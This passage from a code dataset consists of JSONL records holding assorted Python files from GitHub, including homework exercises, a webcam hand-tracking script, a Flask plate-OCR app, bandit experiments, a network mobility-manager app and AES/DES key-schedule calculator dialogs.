here.\n\n\ndef max_diff(lst):\n new_list = lst[:2]\n for i in range(2, len(lst)):\n if abs(lst[i] - new_list[-1]) > abs(new_list[-1] - new_list[-2]):\n new_list.append(lst[i])\n return new_list\n\n\nprint(max_diff(lst4))\n\n# End of code for question 4\n\n#########################################\n# Question 5 - do not delete this comment\n#########################################\n\n# Replace the assignment with other strings to test your code.\nmy_string = 'abbcccddddeeeeeffffggghhi'\nk = 4 # Replace the assignment with a positive integer to test your code.\n\n# Write the rest of the code for question 5 below here.\n\n\ndef match_str_to_length(string, length):\n accumulator = ''\n for char in list(string):\n if len(accumulator) == 0 or accumulator[-1] == char:\n accumulator += char\n else:\n accumulator = char\n if len(accumulator) == length:\n return f'For length {length}, found the substring {accumulator}!'\n return f'Didn\\'t find a substring of length {length}'\n\n\nprint(match_str_to_length(my_string, k))\n# End of code for question 5\n","repo_name":"david-uni/python-help","sub_path":"homeworks/ex2/ex2_version_2.py","file_name":"ex2_version_2.py","file_ext":"py","file_size_in_byte":3726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71686601760","text":"## muestra los puntos de las manos con una clase aparte\r\n## archivo de corre en entorno virtual (manos), no funciona en consola el .py\r\n## usa python 3.7.8 64 bit como interprete\r\n## se debe crear primero en env, luedo dentro de la carpeta activarlo con \\scripts.\\activate\r\n## se desactiva el env con deactivate\r\n## si tiene problemas con politicas de usuario\r\n##ejecutar comando en consola set-executionPolicy - scope currentuser unrestricted si \r\n## se confirma con get-executionpolicy se debe ver unrestricted\r\n## se inicia GIT en el icono, lo mejor es antes de hacer el archivo\r\n\r\nimport cv2\r\n\r\nimport numpy as np\r\n##se importa el modulo mde google mediapipe que se baja con pip mediapipe\r\nimport mediapipe as mp\r\nimport time\r\n## se importa el modulo creado que es un archivo .py con varias funciones\r\nimport Hand_Module as HM\r\n\r\n\r\ncurrentTime=0\r\n\r\npreviousTime=0\r\ncap= cv2.VideoCapture(0)\r\n## se crea una instancia al modulo creado\r\ndetector= HM.HandDetector()\r\n\r\n\r\nwhile True:\r\n\r\n sucssess, imagencamara= cap.read()\r\n ## se usa la funcion del modulo creado para detectar manos\r\n imagencamara= detector.findHands(imagencamara, Draw=True)\r\n ## se hace una lista de los puntos de las manos para dibujarlas\r\n lamlist= detector.findPosicion(imagencamara, draw=True)\r\n ## se indica el punto que se quiere imprimir con su ubucacion \r\n if len(lamlist) !=0:\r\n print(lamlist[8])\r\n ## se calcula el tiempo de lo FPS y se imprime\r\n currentTime=time.time()\r\n\r\n fsp= 1/(currentTime-previousTime)\r\n\r\n previousTime= currentTime\r\n\r\n cv2.putText(imagencamara, str(int(fsp)),(10,78), cv2.FONT_HERSHEY_COMPLEX, 2, (255,0,255),3)\r\n # se muestra la imagen con los datos\r\n cv2.imshow(\"imagen\", imagencamara)\r\n # se espera a cancelar con una tecla o Ctrl + C en consola\r\n cv2.waitKey(1)","repo_name":"jlamprea/opencv_mediapipe_manos","sub_path":"myplayhands.py","file_name":"myplayhands.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37421538274","text":"# create list\nlist1 = [0]\nlist2 = [0]\n# put new numbers to list\n'''\nappend appends an object \nextend extends a list by appending elements \n'''\nlist1.append([1,2,3])\nlist2.extend([1,2,3])\n\nlist1.remove([1,2,3])\n\nrlist = list1\nclist = rlist.copy()\nclist.insert(0,-3)\nclist.insert(0,-2)\nclist.insert(0,-3)\n\n# remove 0 from clist\nclist.pop(clist.index(0))\n\nprint(list1, list2, rlist, clist, sep= '\\n')\n\n# by clearing original list the copy will be cleared too\nlist1.clear()\nprint(list1, list2, rlist, clist, sep= '\\n')","repo_name":"Meschr/PythonAufgaben","sub_path":"Uebung2/Aufgabe_03c.py","file_name":"Aufgabe_03c.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23813737562","text":"def sort_out_clicks(list_of_numbers):\n index = 0\n lenght = len(list_of_numbers)\n grouped_clicks = []\n # we define our starting index, while base case and we initiate a lits we gonna use later #\n # to append all the grouped clicks#\n while index < lenght:\n # use the algorith from a previous exercise where we start to iterate though our list #\n # of clicks with a while loop. We set a item we gonna use for initial comparison #\n # we defince a look ahead index for comparison #\n current_digit = list_of_numbers[index]\n look_ahead = index + 1\n current_group = [current_digit]\n while look_ahead < lenght and current_digit == list_of_numbers[look_ahead]:\n # inner loop thats gonna separte our clicks #\n current_group.append(current_digit)\n look_ahead += 1\n grouped_clicks.append(current_group)\n index = look_ahead\n return grouped_clicks\n\n\nsymbols_dict = {\n 2: 'abc',\n 3: 'def',\n 4: 'ghi',\n 5: 'jkl',\n 6: 'mno',\n 7: 'pqrs',\n 8: 'tuv',\n 9: 'wxyz'\n}\n# a dictionary that imitates the buttons of a retro cell #\ndef right_length(index, lenght):\n return index < lenght\n\ndef numbers_to_message(pressed_sequence):\n sorted_clicks = sort_out_clicks(pressed_sequence)\n word = []\n capital = False\n # we initiate a boolen for the digit 1 case which capitalizes the next letter in our message #\n for item in sorted_clicks:\n button = item[0]\n if button == 1:\n # when we must capitalize next#\n capital = True\n continue\n if button == 0:\n # when we must add an interval to the message #\n word.append(' ')\n continue\n if button == -1:\n # just skip #\n continue\n length = len(symbols_dict[button])\n if not item.count(button) == 1:\n index = (item.count(button) - 1) % length\n # we use modul to ensure we get a symbol even when the clicks exceed the len of the value#\n else:\n index = item.count(button) - 1\n # corner case where the modulo wont work #\n if capital:\n # the case where we must capitalise #\n symbol = symbols_dict[button][index].upper()\n capital = False\n\n\n else:\n symbol = symbols_dict[button][index]\n # we append the symbol to the list #\n word.append(symbol)\n # we return the joined message #\n return ''.join(word)\n\ntests = [\n ([2, -1, 2, 2, -1, 2, 2, 2], \"abc\"),\n ([2, 2, 2, 2], \"a\"),\n ([1, 4, 4, 4, 8, 8, 8, 6, 6, 6, 0, 3, 3, 0, 1, 7, 7, 7, 7, 7, 2, 6, 6, 3, 2], \"Ivo e Panda\")\n]\n\nfor test, expected in tests:\n print(expected == numbers_to_message(test))\n\n\n\n\n\n\n","repo_name":"antonko-de/HackBulgaria-Python-101-Forever","sub_path":"C01/C01P16S01.py","file_name":"C01P16S01.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71541956321","text":"import numpy as np\n\nfrom collections import defaultdict\nimport pandas as pd\nfrom discrete_batch_bandits import bkcub_experiment, sbpe_experiment\n\nlambdas = [1e0, 1e1, 1e2]\n\ndef bkucb_experiments(dataset_name, lambda_grid):\n\n loss_std = 0\n best_loss = np.inf\n print('-' * 80)\n print('BKCUB experiment, dataset {}'.format(dataset_name))\n\n for lbd in lambda_grid:\n print('-' * 80)\n print('Lambda {}'.format(lbd))\n\n seeds_losses = []\n\n\n for random_seed in range(10):\n # a posteriori selection\n print('-' * 80)\n print('Seed {}'.format(random_seed))\n rollout_losses = bkcub_experiment(dataset_name, lbd, random_seed)\n\n final_loss = np.squeeze(rollout_losses)[-1]\n seeds_losses.append(final_loss)\n\n lbd_loss = np.mean(seeds_losses)\n\n if lbd_loss < best_loss:\n best_loss = lbd_loss\n loss_std = np.std(seeds_losses)\n\n return best_loss, loss_std\n\n\ndef sbpe_experiments(dataset_name):\n seeds_losses = []\n\n print('-' * 80)\n print('SBPE experiment, dataset {}'.format(dataset_name))\n\n for random_seed in range(10):\n print('-' * 80)\n print('Seed {}'.format(random_seed))\n # a posteriori selection\n rollout_losses = sbpe_experiment(dataset_name, random_seed)\n\n final_loss = np.squeeze(rollout_losses)[-1]\n seeds_losses.append(final_loss)\n\n loss = np.mean(seeds_losses)\n loss_std = np.std(seeds_losses)\n\n return loss, loss_std\n\nif __name__ == '__main__':\n results = defaultdict(list)\n\n\n\n dataset_name = 'yeast'\n # Report performances\n\n sbpe_perf, sbpe_std = sbpe_experiments(dataset_name)\n bkucb_perf, bkucb_std = bkucb_experiments(dataset_name, lambdas)\n\n results['dataset'] += [dataset_name]\n\n results['BKUCB'] += ['$%.3f \\pm %.3f$' % (bkucb_perf, bkucb_std)]\n results['SBPE'] += ['$%.3f \\pm %.3f$' % (sbpe_perf, sbpe_std)]\n\n df = pd.DataFrame(data=results)\n df.to_latex(\n 'batch_bandit_results.tex', index=False, column_format='r', escape=False\n )\n\n print('-' * 80)\n print(df)\n print('-' * 80)\n\n dataset_name = 'scene'\n # Report performances\n bkucb_perf, bkucb_std = bkucb_experiments(dataset_name, lambdas)\n sbpe_perf, sbpe_std = sbpe_experiments(dataset_name)\n\n\n results['dataset'] += [dataset_name]\n\n results['BKUCB'] += ['$%.3f \\pm %.3f$' % (bkucb_perf, bkucb_std)]\n results['SBPE'] += ['$%.3f \\pm %.3f$' % (sbpe_perf, sbpe_std)]\n\n df = pd.DataFrame(data=results)\n df.to_latex(\n 'batch_bandit_results.tex', index=False, column_format='r', escape=False\n )\n\n print('-' * 80)\n print(df)\n print('-' * 80)\n\n\n\n","repo_name":"criteo-research/sequential-conterfactual-risk-minimization","sub_path":"batch_bandit_experiments.py","file_name":"batch_bandit_experiments.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"6146920334","text":"\"\"\"\n====================================================================================\nТеория(посмотреть https://russianblogs.com/article/23801660249/):\nАвл-дерево - двоичное дерево.\nДерево-поиска - слева всегда наименьший эелемент, справа всегда наибольший.\nВысота поддерева - максимальное количесво взаимосвязанных элементов в данном дереве.\nБаланс - левая_высоста-правая_высота выбранного узла.\n====================================================================================\nМалый правый поворот:\n1.когда баланс корня = +2(точно есть ребенок)\n2.когда баланс ребенка = +1\n 1)меняем местами родителя и ребенка( передаём правую/левую ветку приобмене)\nБольшой правый п��ворот:\n1.когда баланс ребенка = -1\n\"\"\"\n\n\"\"\"\nЗа основу взят пакет - treelib (https://treelib.readthedocs.io/en/latest/). \nВелосипедный код - плохо (ничтожный, хоть и новый, деревянный велосипед никому не нужен),\nпоэтому взятие чужого кода - хорошая и полезная практика для любого программиста. На что способен это пакет:\n 1.Создание деревьев\n 2.Добавление нового элемента с помощью метода create_node(\"значение узла\", \"идентификатор\", \"родитель\")\n 3.Красивое отображение в консоли с помощью метода show\n 4.Удаление узла с помощью remove_node(\"идентификатор\")\n\"\"\"\n\nfrom treelib import Tree, Node\n\n\n# нереализованный\nclass MyNode(Node):\n def __init__(self, tag, identifier, data=None, parent=None, left=None, right=None):\n self.left = left\n self.right = right\n self.data = tag\n args = [arg for arg in [tag, identifier, data] if arg != None]\n super(MyNode, self).__init__(*args)\n\n\n# возвращает тестовое дерево\ndef test_tree() -> Tree:\n tree = Tree()\n data = [\n {\"tag\": 1, \"identifier\": 1, \"parent\": None},\n {\"tag\": 2, \"identifier\": 2, \"parent\": 1},\n {\"tag\": 3, \"identifier\": 3, \"parent\": 1},\n {\"tag\": 4, \"identifier\": 4, \"parent\": 3},\n {\"tag\": 5, \"identifier\": 5, \"parent\": 3},\n {\"tag\": 6, \"identifier\": 6, \"parent\": 2}\n ]\n for node in data:\n tree.create_node(tag=node[\"tag\"], identifier=node[\"identifier\"], parent=node[\"parent\"])\n return tree\n\n\n\"\"\"\nПОВОРОТ НА ПРАВА\n\ndef right_rotate(self, node):\n if not node or not node.left:\n raise AssertionError(\n \" right rotate to illegal node \" + str(node))\n\n parent_node = node.parent\n node_left = node.left\n node.left = node_left.right\n\n if node.left:\n node.left.parent = node\n node_left.right = node\n node.parent = node_left\n if parent_node:\n if node == parent_node.left:\n parent_node.left = node_left\n else:\n parent_node.right = node_left\n node_left.parent = parent_node\n else:\n self.root = node_left\n node_left.parent = None\"\"\"\n\ntree = test_tree()\ntree.show()\ntext = tree.subtree(3)\nprint(type(text))\n","repo_name":"TimurStorm/AVL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3622,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28933988336","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n\nclass Solution:\n def middleNode(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n\n val_list = [head.val]\n node = head\n node_count = 1\n\n while node.next:\n node = node.next\n val_list.append(node.val)\n node_count += 1\n\n return val_list[int(node_count / 2):]\n","repo_name":"kkxujq/leetcode","sub_path":"answer/0876/876.linningmii.py","file_name":"876.linningmii.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"54"} +{"seq_id":"2641309701","text":"import csv as csv\nimport numpy as np\nfrom random import uniform\nimport math\nimport pandas as pd\n\ndata = pd.read_csv('./csv/train.csv')\n\nfare_ceiling = 40\n# then modify the data in the Fare column to = 39, if it is greater or equal to the ceiling\ndata[ data.Fare >= fare_ceiling] = fare_ceiling - 1.0\ndata['Gender']=df.Sex.map({'female':0,'male':1})\nfare_bucket = 10\n\n# Fill the missing ages\nage_median = {}\nfor i in range (0, 2):\n for j in range (1,4):\n age_median[(i+j*3)] = data[(data['Gender'] == i) & (data['Pclass'] == j)].Age.median()\ndata['AgeNew'] = data.apply(lambda x: age_median.get(x.Gender + 3*x.Pclass) if math.isnan(x.Age) else x.Age, axis=1)\n\nsurvive = {}\n\nfor i in xrange(3):\n for j in xrange(4):\n for k in xrange(5):\n female = data[(data.Gender==0) & (data.Pclass==(i+1)) \\\n & (data.Fare>=j*fare_bucket) & (data.Fare < (j+1)*fare_bucket)\\\n & (data.AgeNew>(k*20)) & (data.AgeNew<=((k+1)*20))]\n key = 0 + 10*i + 100*j + 1000*k\n survive[key] = female.Survived.mean();\n \n male = data[(data.Gender==1) & (data.Pclass==(i+1)) \\\n & (data.Fare>=j*fare_bucket) & (data.Fare < (j+1)*fare_bucket)\\\n & (data.AgeNew>(k*20)) & (data.AgeNew<=((k+1)*20))]\n key = 1 + 10*i + 100*j + 1000*k\n survive[key] = male.Survived.mean();\n\ntest_file = open('./csv/test.csv', 'rb')\ntest_file_object = csv.reader(test_file)\nheader = test_file_object.next()\n\nprediction_file = open(\"genderbasedmodel.csv\", \"wb\")\nprediction_file_object = csv.writer(prediction_file)\nprediction_file_object.writerow([\"PassengerId\", \"Survived\"])\n\n\n\nfor row in test_file_object: # For each row in test.csv\n i = 0 if row[3] == 'female' else 1\n j = int(row[1]) - 1\n #print row[0], row[8]\n k = 0 if not row[8] else float(row[8]) // 10\n k = k if k <=3 else 3\n l = 4 if not row[4] else float(row[4]) // 20\n p = survive.get(i + 10*j + 100*k + 1000*l)\n \n if round(uniform(0,1),2) < p:\n prediction_file_object.writerow([row[0],'1']) # predict 1\n else:\n prediction_file_object.writerow([row[0],'0']) # predict 0\n \ntest_file.close()\nprediction_file.close()\n\n","repo_name":"azelman/HeatMap","sub_path":"titanic.py","file_name":"titanic.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25049413269","text":"from wsgiref.util import request_uri\nfrom flask import Flask, render_template, request\n \nimport os \nfrom deeplearning1 import OCR\nfrom deeplearning import OCR_resnet\nfrom deeplearningdif import OCR_dif\nfrom yolo_real import yolo_real_time\nfrom youtube import yolo_real_time_youtube\n\napp = Flask(__name__)\n\nBASE_PATH = os.getcwd()\nUPLOAD_PATH = os.path.join(BASE_PATH,'static/upload/')\n\n\n@app.route('/',methods=['POST','GET'])\ndef index():\n if request.method == 'POST':\n upload_file = request.files['image_name']\n filename = upload_file.filename\n path_save = os.path.join(UPLOAD_PATH,filename)\n upload_file.save(path_save)\n text = OCR(path_save,filename)\n\n return render_template('index.html',upload=True,upload_image=filename,text=text)\n\n return render_template('index.html',upload=False)\n\n@app.route('/yolo',methods=['POST','GET'])\ndef yolo():\n if request.method == 'POST':\n upload_file = request.files['image_name']\n filename = upload_file.filename\n path_save = os.path.join(UPLOAD_PATH,filename)\n upload_file.save(path_save)\n yolo_real_time(path_save,filename)\n\n return render_template('yolo.html',upload=True,upload_image=filename)\n\n return render_template('yolo.html',upload=False)\n\n@app.route('/resnet',methods=['POST','GET'])\ndef resnet():\n if request.method == 'POST':\n upload_file = request.files['image_name']\n filename = upload_file.filename\n path_save = os.path.join(UPLOAD_PATH,filename)\n upload_file.save(path_save)\n text = OCR_resnet(path_save,filename)\n\n return render_template('resnet.html',upload=True,upload_image=filename,text=text)\n\n return render_template('resnet.html',upload=False)\n\n@app.route('/resnet_dif',methods=['POST','GET'])\ndef resnet_dif():\n if request.method == 'POST':\n upload_file = request.files['image_name']\n filename = upload_file.filename\n path_save = os.path.join(UPLOAD_PATH,filename)\n upload_file.save(path_save)\n text = OCR_dif(path_save,filename)\n\n return render_template('resnet_dif.html',upload=True,upload_image=filename,text=text)\n\n return render_template('resnet_dif.html',upload=False)\n\n\n\nif __name__ ==\"__main__\":\n app.run(debug=True)","repo_name":"omeryildizce/Arac-Plaka-Takip-Projesi","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32181334822","text":"import sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(10**5)\n\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\ncount = 0\nT = int(input())\n\n\n\ndef dfs(x,y) :\n if x<0 or y<0 or x>=N or y>=M :\n return False\n if board[x][y] == 1 :\n board[x][y] = 0\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n dfs(nx,ny)\n return True\n return False\n\n\n\nfor i in range(T) :\n result =0\n M,N,K= map(int,input().split())\n board = [[0 for i in range(M)] for j in range(N)]\n for j in range(K) :\n a, b = map(int,input().split())\n board[b][a] =1\n\n for i in range(N):\n for j in range(M) :\n if dfs(i,j) == True :\n result +=1\n print(result,end='\\n')\n","repo_name":"Dongdongbro/Algorithm","sub_path":"week03/DFS 유기농배추.py","file_name":"DFS 유기농배추.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40975569031","text":"from empower.core.app import EmpowerApp\nfrom empower.core.app import DEFAULT_PERIOD\n\nfrom empower.datatypes.etheraddress import EtherAddress\nfrom empower.core.resourcepool import ResourcePool\n\n\nDEFAULT_LIMIT = -10\n\n\nclass MobilityManager(EmpowerApp):\n \"\"\"Basic mobility manager.\n\n Command Line Parameters:\n\n period: loop period in ms (optional, default 5000ms)\n\n Example:\n\n ID=\"52313ecb-9d00-4b7d-b873-b55d3d9ada26\"\n ./empower-runtime.py apps.mobilitymanager.mobilitymanager:$ID\n\n \"\"\"\n\n def __init__(self, **kwargs):\n self.__limit = DEFAULT_LIMIT\n EmpowerApp.__init__(self, **kwargs)\n\n # Register an wtp up event\n self.wtpup(callback=self.wtp_up_callback)\n\n # Register an lvap join event\n self.lvapjoin(callback=self.lvap_join_callback)\n\n def lvap_join_callback(self, lvap):\n \"\"\"Called when a new LVAP connects the network.\"\"\"\n\n lvap.rssi(relation='LT', value=self.limit, callback=self.low_rssi)\n\n def handover(self, lvap):\n \"\"\" Handover the LVAP to a WTP with\n an RSSI higher that -65dB. \"\"\"\n\n self.log.info(\"Running handover...\")\n\n # Initialize the Resource Pool\n pool = ResourcePool()\n\n # Update the Resource Pool with all\n # the available Resourse Blocks\n for wtp in self.wtps():\n pool = pool | wtp.supports\n\n # Select matching Resource Blocks\n matches = pool & lvap.scheduled_on\n\n # Filter Resource Blocks by RSSI\n valid = [block for block in matches\n if block.ucqm[lvap.addr]['ewma_rssi'] >= -85]\n\n if not valid:\n return\n\n new_block = max(valid, key=lambda x: x.ucqm[lvap.addr]['ewma_rssi'])\n self.log.info(\"LVAP %s setting new block %s\" % (lvap.addr, new_block))\n\n lvap.scheduled_on = new_block\n\n # Set port\n for block in lvap.scheduled_on:\n port = lvap.scheduled_on[block]\n port.no_ack = True\n port.rts_cts = 3500\n port.mcs = [6, 12, 54]\n\n @property\n def limit(self):\n \"\"\"Return loop period.\"\"\"\n\n return self.__limit\n\n @limit.setter\n def limit(self, value):\n \"\"\"Set limit.\"\"\"\n\n limit = int(value)\n\n if limit > 0 or limit < -100:\n raise ValueError(\"Invalid value for limit\")\n\n self.log.info(\"Setting limit %u dB\" % value)\n self.__limit = limit\n\n def wtp_up_callback(self, wtp):\n \"\"\"Called when a new WTP connects to the controller.\"\"\"\n\n for block in wtp.supports:\n self.ucqm(block=block, every=self.every)\n\n def low_rssi(self, trigger):\n \"\"\" Perform handover if an LVAP's rssi is\n going below the threshold. \"\"\"\n\n lvap_addr = EtherAddress(trigger.events[-1]['lvap'])\n lvap = self.lvap(lvap_addr)\n\n self.handover(lvap)\n\n def loop(self):\n \"\"\" Periodic job. \"\"\"\n\n # Handover every active LVAP to\n # the best WTP\n for lvap in self.lvaps():\n self.handover(lvap)\n\n\ndef launch(tenant_id, limit=DEFAULT_LIMIT, every=DEFAULT_PERIOD):\n \"\"\" Initialize the module. \"\"\"\n\n return MobilityManager(tenant_id=tenant_id, limit=limit, every=every)\n","repo_name":"herlesupreeth/Empcontroller","sub_path":"empower/apps/mobilitymanager/mobilitymanager.py","file_name":"mobilitymanager.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26086561595","text":"from PySide.QtGui import *\nimport chipwhisperer.common.utils.qt_tweaks as QtFixes\nfrom chipwhisperer.common.utils import util\nfrom chipwhisperer.analyzer.attacks.models.AES128_8bit import AES128_8bit\nfrom chipwhisperer.analyzer.attacks.models.DES import DES\n\n\nclass AesKeyScheduleDialog(QtFixes.QDialog):\n\n def __init__(self, parent=None):\n super(AesKeyScheduleDialog, self).__init__(parent)\n self.model = AES128_8bit()\n\n layout = QVBoxLayout()\n self.setLayout(layout)\n\n self.outmode = QComboBox()\n self.outmode.addItem(\"AABBCC...EEFF\", [\"\", \"\"])\n self.outmode.addItem(\"AA:BB:CC...EE:FF\", [\"\", \":\"])\n self.outmode.addItem(\"AA BB CC...EE FF\", [\"\", \" \"])\n self.outmode.addItem(\"AA,BB,CC...EE,FF\", [\"\", \",\"])\n self.outmode.addItem(\"0xAA, 0xBB, 0xCC... 0xEE, 0xFF\", [\"0x\", \", \"])\n self.outmode.currentIndexChanged.connect(self.inTextChanged)\n\n self.indata = QtFixes.QLineEdit(\"\")\n self.indata.setFont(QFont(\"Courier\"))\n\n self.keysched = QTextEdit(\"\")\n self.keysched.setFont(QFont(\"Courier\"))\n\n self.outkey = QtFixes.QLineEdit(\"\")\n self.outkey.setReadOnly(True)\n self.outkey.setFont(QFont(\"Courier\"))\n\n outmodeL = QHBoxLayout()\n outmodeL.addWidget(QLabel(\"Format:\"))\n outmodeL.addWidget(self.outmode)\n outmodeL.addStretch()\n\n self.inprnd = QComboBox()\n self.inprnd.currentIndexChanged.connect(self.inTextChanged)\n self.setKeyLength(128)\n\n indataL = QHBoxLayout()\n indataL.addWidget(QLabel(\"Key:\"))\n indataL.addWidget(self.indata)\n indataL.addWidget(self.inprnd)\n self.indata.textChanged.connect(self.inTextChanged)\n\n outdataL = QHBoxLayout()\n outdataL.addWidget(QLabel(\"Key:\"))\n outdataL.addWidget(self.outkey)\n\n gbIndata = QGroupBox(\"Input Known Key\")\n gbIndata.setLayout(indataL)\n layout.addWidget(gbIndata)\n\n gbOutdata = QGroupBox(\"Output Desired Key\")\n outdataTotalL = QVBoxLayout()\n outdataTotalL.addLayout(outmodeL)\n outdataTotalL.addLayout(outdataL)\n gbOutdata.setLayout(outdataTotalL)\n layout.addWidget(gbOutdata)\n\n gbKeySched = QGroupBox(\"Full Key Schedule\")\n keyschedL = QVBoxLayout()\n keyschedL.addWidget(self.keysched)\n gbKeySched.setLayout(keyschedL)\n\n layout.addWidget(gbKeySched)\n\n self.setWindowTitle(\"AES-128/AES-256 Key Schedule Calculator\")\n self.setObjectName(\"AES Key Schedule\")\n self.setWindowIcon(QIcon(\":/images/cwiconA.png\"))\n self.setMinimumSize(800,400)\n\n def aesmodeChanged(self, indx):\n self.setKeyLength(self.aesmode.itemData(indx))\n\n def setKeyLength(self, klen):\n pi = self.inprnd.currentIndex()\n self.inprnd.blockSignals(True)\n if klen == 128:\n self.inprnd.clear()\n self.inprnd.addItem(\"0 (Initial Enc.)\", 0)\n self.inprnd.addItem(\"1 (2nd-Round Enc.)\", 1)\n self.inprnd.addItem(\"10 (Initial Dec.)\", 10)\n elif klen == 256:\n self.inprnd.clear()\n self.inprnd.addItem(\"0/1 (Initial Enc.)\", 0)\n self.inprnd.addItem(\"13/14 (Initial Dec.)\", 13)\n else:\n raise ValueError(\"Invalid keylength: %d\" % klen)\n\n if pi > -1:\n self.inprnd.setCurrentIndex(pi)\n self.inprnd.blockSignals(False)\n\n def inTextChanged(self, data=None):\n data = self.indata.text()\n try:\n newdata = util.hexstr2list(data)\n\n if len(newdata) != 16 and len(newdata) != 32:\n err = \"ERR: Len=%d: %s\" % (len(newdata), newdata)\n self.outkey.setText(err)\n self.keysched.setText(err)\n else:\n if len(newdata) == 16:\n self.setKeyLength(128)\n elif len(newdata) == 32:\n self.setKeyLength(256)\n\n #Read settings\n delim = self.outmode.itemData(self.outmode.currentIndex())\n desired = 0\n inpround = self.inprnd.itemData(self.inprnd.currentIndex())\n\n key = newdata\n\n # Get initial key\n result = self.model.keyScheduleRounds(key, inpround, desired)\n if len(key) == 32:\n result.extend(self.model.keyScheduleRounds(key, inpround, desired + 1))\n\n rstr = [\"%02x\" % t for t in result]\n rstr = (delim[1] + delim[0]).join(rstr)\n rstr = delim[0] + rstr\n\n self.outkey.setText(rstr)\n\n # Get entire key schedule\n if len(key) == 16:\n rnds = 10\n elif len(key) == 32:\n rnds = 14\n\n totalrndstr = ''\n for r in range(0, rnds+1):\n result = self.model.keyScheduleRounds(key, inpround, r)\n str = [\"%02x\" % t for t in result]\n str = (delim[1] + delim[0]).join(str)\n str = delim[0] + str\n totalrndstr += \"%2d: \" % r\n totalrndstr += str + \"\\n\"\n\n self.keysched.setText(totalrndstr)\n\n except ValueError:\n self.outkey.setText(\"ERR in HEX: %s\" % data)\n\n\nclass DesKeyScheduleDialog(QtFixes.QDialog):\n\n def __init__(self, parent=None):\n super(DesKeyScheduleDialog, self).__init__(parent)\n self.model = DES()\n\n layout = QVBoxLayout()\n self.setLayout(layout)\n\n self.indata = QtFixes.QLineEdit(\"\")\n self.indata.setFont(QFont(\"Courier\"))\n\n self.keysched = QTextEdit(\"\")\n self.keysched.setFont(QFont(\"Courier\"))\n\n self.inprnd = QComboBox()\n self.inprnd.currentIndexChanged.connect(self.inTextChanged)\n\n indataL = QHBoxLayout()\n indataL.addWidget(QLabel(\"Key:\"))\n indataL.addWidget(self.indata)\n indataL.addWidget(QLabel(\"Round:\"))\n indataL.addWidget(self.inprnd)\n self.indata.textChanged.connect(self.inTextChanged)\n\n gbIndata = QGroupBox(\"Round Key/Subkey\")\n gbIndata.setLayout(indataL)\n layout.addWidget(gbIndata)\n\n gbKeySched = QGroupBox(\"Full Key Schedule\")\n keyschedL = QVBoxLayout()\n keyschedL.addWidget(self.keysched)\n keyschedL.addWidget(QLabel(\"X - Parity bits (not used); ? - Unknown/lost bits (could not be recovered)\"))\n gbKeySched.setLayout(keyschedL)\n\n layout.addWidget(gbKeySched)\n\n self.setWindowTitle(\"DES Key Schedule Calculator\")\n self.setObjectName(\"DES Key Schedule\")\n self.refreshRoundKeysLength()\n self.setMinimumSize(800,400)\n\n def refreshRoundKeysLength(self):\n self.inprnd.blockSignals(True)\n self.inprnd.clear()\n for n in range(self.model.getNumRoundKeys()+1):\n self.inprnd.addItem(str(n), n)\n self.inprnd.setCurrentIndex(0)\n self.inprnd.blockSignals(False)\n\n def inTextChanged(self, _=None):\n try:\n key = util.hexstr2list(self.indata.text())\n key = [int(d) for d in key]\n\n #Read settings\n inpround = self.inprnd.itemData(self.inprnd.currentIndex())\n\n # Get entire key schedule\n totalrndstr = \"\"\n roundKeys = self.model.getRoundKeys(key, inpround)\n for i, key in enumerate(roundKeys):\n totalrndstr += \"%2d: \" % i\n for j, bit in enumerate(key):\n if bit is not None:\n totalrndstr += str(bit)\n elif i == 0 and j % 8 == 7:\n totalrndstr += 'X'\n else:\n totalrndstr += '?'\n totalrndstr += \"\\n\"\n\n self.keysched.setText(totalrndstr)\n\n except:\n self.keysched.clear()\n","repo_name":"acaldaya/chipwhisperer","sub_path":"software/chipwhisperer/common/ui/KeyScheduleDialog.py","file_name":"KeyScheduleDialog.py","file_ext":"py","file_size_in_byte":7915,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"33239927893","text":"# Write a program that counts the number of occurances of word in a sentence entered by user without using built in function.\n\ncount = 0\nsentence = input(\"Enter a sentence: \")\nprint(sentence)\nlist_word = input(\"Wanted word: \")\nprint(list_word)\n\nfor i in range(len(sentence)-len(list_word)+1):\n if sentence[i: i+len(list_word)] == list_word:\n count += 1\n print(list_word)\nprint(count)\n\n\n'''\nAnother way\nsentence = input(\"Please enter a sentence\\n\")\nlist_of_word = sentence.split()\n\nfor word in list_of_word:\n cnt = list_of_word.count(word)\n print(word, \" \", 